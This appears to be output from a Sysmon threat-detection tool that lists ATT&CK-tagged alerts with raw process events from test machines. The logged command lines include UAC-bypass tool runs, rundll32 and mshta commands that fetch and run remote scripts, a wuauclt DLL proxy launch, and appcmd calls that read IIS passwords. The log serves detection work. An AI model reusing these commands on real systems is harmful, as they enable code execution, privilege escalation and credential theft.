SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A
00247C92-1749-6010-0000-0010EFAAD92E
23168
C:\Windows\SysWOW64\cmd.exe
"C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /delete /tn elevator ),1,"
1
5
4
1
0
0x8000000000000000
16249
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 00:32:40.164
365ABB72-69A8-5CD7-0000-0010C0982200
3792
C:\Windows\System32\schtasks.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Manages scheduled tasks
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\schtasks.exe" /delete /tn elevator
c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\
IEWIN7\IEUser
365ABB72-5DEC-5CD7-0000-00204A380100
0x1384a
1
High
SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9
365ABB72-6998-5CD7-0000-00104E422200
2740
C:\Python27\python.exe
python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1,"
1
5
4
1
0
0x8000000000000000
6175
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:45.383
365ABB72-FE6D-5CEB-0000-0010332A0C00
3876
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1,"
1
5
4
1
0
0x8000000000000000
6175
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:45.383
365ABB72-FE6D-5CEB-0000-0010332A0C00
3876
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-FD85-5CEB-0000-00104C0E0B00
1944
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5410
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 11:23:17.702
747F3D96-6EA5-5D45-0000-00108FD3E100
7844
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-D4E9-5D45-0000-0020E7030000
0x3e7
1
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6EA5-5D45-0000-0010EED0E100
4768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5308
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 10:51:47.872
747F3D96-6743-5D45-0000-001068D7B500
6456
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe"
C:\Users\IEUser\Desktop\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020FBD31800
0x18d3fb
1
Medium
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6742-5D45-0000-00104A66B500
6380
C:\Users\IEUser\Desktop\UACME.exe
UACME.exe 32
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
2196442
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2020-10-13 20:11:42.277
00247C92-09FE-5F86-0000-0010AC861401
6372
C:\Windows\System32\cmd.exe
10.0.18362.449 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
c:\windows\system32\cmd.exe
c:\Windows\System32\
LAPTOP-JU4M3I0E\bouss
00247C92-DE70-5F85-0000-002059F80600
0x6f859
1
Medium
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
00247C92-09FE-5F86-0000-001051841401
1716
C:\Windows\System32\wuauclt.exe
wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558452777.286254,2019-05-21T19:32:57.286254+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1,"
1
5
4
1
0
0x8000000000000000
4125
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:57.276
365ABB72-1A29-5CE4-0000-001054E32101
1532
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-4F8A-5CE3-0000-0010C5BB4800
3548
C:\Windows\System32\cmd.exe
"cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1611667274.296774,2021-01-26T17:21:14.296774+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd ),1,"
1
5
4
1
0
0x8000000000000000
2429137
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2021-01-26 13:21:13.976
00247C92-1749-6010-0000-0010EFAAD92E
23168
C:\Windows\SysWOW64\cmd.exe
10.0.18362.1316 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd
C:\Users\bouss\source\repos\blabla\blabla\
LAPTOP-JU4M3I0E\bouss
00247C92-5082-600D-0000-0020A246F726
0x26f746a2
5
Medium
SHA1=DE550F262D31FF81730867A7E294795D085F503B,MD5=E567B7F80B21CC8905383BE1073F3707,SHA256=E5CC034E9062E1211FDDE5F85EBF2BD4E4EF63272BA23877C185C94FB503891E,IMPHASH=392B4D61B1D1DADC1F06444DF258188A
00247C92-1749-6010-0000-0010348FD92E
2988
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.124804,2019-05-27T05:29:20.124804+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password ),1,"
1
5
4
1
0
0x8000000000000000
5979
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:20.084
365ABB72-3D70-5CEB-0000-0010F2DEFF00
2772
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
16248
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 00:32:35.289
365ABB72-69A3-5CD7-0000-00109D7F2200
1860
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
c:\Windows\System32\cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-DC77-5CD7-0000-0020E7030000
0x3e7
0
System
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-69A3-5CD7-0000-001064792200
3432
C:\Windows\System32\taskeng.exe
taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service:
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ),1,"
1
5
4
1
0
0x8000000000000000
4902
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:18.241
747F3D96-661E-5D3F-0000-0010A3148700
776
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1,"
1
5
4
1
0
0x8000000000000000
6173
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:44.023
365ABB72-FE6C-5CEB-0000-0010050C0C00
3520
C:\Windows\System32\wbem\WMIC.exe
6.1.7600.16385 (win7_rtm.090713-1255)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
365ABB72-FE6B-5CEB-0000-00102A090C00
1536
C:\Windows\System32\cmd.exe
cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1,"
1
5
4
1
0
0x8000000000000000
16452
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 14:18:09.573
365ABB72-2B21-5CD8-0000-001039DD2500
816
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2B1B-5CD8-0000-0010CCC92500
3320
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16452
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 14:18:09.573
365ABB72-2B21-5CD8-0000-001039DD2500
816
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2B1B-5CD8-0000-0010CCC92500
3320
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16452
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 14:18:09.573
365ABB72-2B21-5CD8-0000-001039DD2500
816
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-2523-5CD8-0000-00204C360100
0x1364c
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-2B1B-5CD8-0000-0010CCC92500
3320
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"
1
5
4
1
0
0x8000000000000000
424115
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:17.542
747F3D96-51F9-5F93-0000-0010551E5E00
9116
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51F9-5F93-0000-001003125E00
7552
C:\Windows\System32\rundll32.exe
Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
1
5
4
1
0
0x8000000000000000
424115
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:17.542
747F3D96-51F9-5F93-0000-0010551E5E00
9116
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51F9-5F93-0000-001003125E00
7552
C:\Windows\System32\rundll32.exe
Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine ("C:\Windows\system32\eventvwr.exe") in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
11116
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-09 01:59:28.903
365ABB72-8980-5CD3-0000-0010134D1F00
3840
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-863B-5CD3-0000-00204A390100
0x1394a
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-8980-5CD3-0000-00105F451F00
3884
C:\Windows\System32\eventvwr.exe
"C:\Windows\system32\eventvwr.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"
1
5
4
1
0
0x8000000000000000
424115
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:17.542
747F3D96-51F9-5F93-0000-0010551E5E00
9116
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51F9-5F93-0000-001003125E00
7552
C:\Windows\System32\rundll32.exe
Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName ),1,"
1
5
4
1
0
0x8000000000000000
5976
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:19.994
365ABB72-3D6F-5CEB-0000-001032DBFF00
1900
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1,"
1
5
4
1
0
0x8000000000000000
11116
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-09 01:59:28.903
365ABB72-8980-5CD3-0000-0010134D1F00
